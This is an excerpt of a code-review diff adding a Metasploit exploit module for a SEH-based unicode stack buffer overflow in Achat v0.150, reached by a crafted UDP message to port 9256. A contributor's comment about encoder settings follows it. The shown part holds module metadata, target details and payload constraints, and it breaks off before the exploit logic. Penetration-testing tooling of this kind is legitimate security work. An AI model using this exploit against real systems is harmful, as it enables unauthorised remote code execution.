modules/exploits/windows/misc/achat_beta.rb

```diff
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Achat Beta v0.150 Buffer Overflow',
+      'Description'    => %q{
+         This module exploits a SEH based unicode stack buffer overflow in Achat v0.150,
+         by sending a crafted message to the default harcoded port 9256. The message
+         overflows the stack and overwrites the SEH handler. The exploit is reliable, but
+         depends of timing. It has two distinct threads that are overflowing the stack in
+         the same time. Tested on Windows XP SP3 and Windows 7.
+         The overflow was found by Peter Kasza.
+      },
+      'Author'         =>
+        [
+         'Balazs Bucsay <balazs.bucsay[-at-]rycon[-dot-]hu>', # Exploit, Metasploit module
+         'Peter Kasza <peter.kasza[-at-]itinsight[-dot-]hu>' # Vulnerability discovery
+        ],
+      'License'	       => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://sourceforge.net/projects/achat/files/AChat%20beta/AChat%20beta%207%20%28v0.150%29/'],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'Space'    => 730,
+#          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
```

Comment:
I tried like this, btw I read and asked about the EncoderType and they said that is a "hack" and should not be used. On the other hand it was not working. Please tell me when you have a proper solution on this.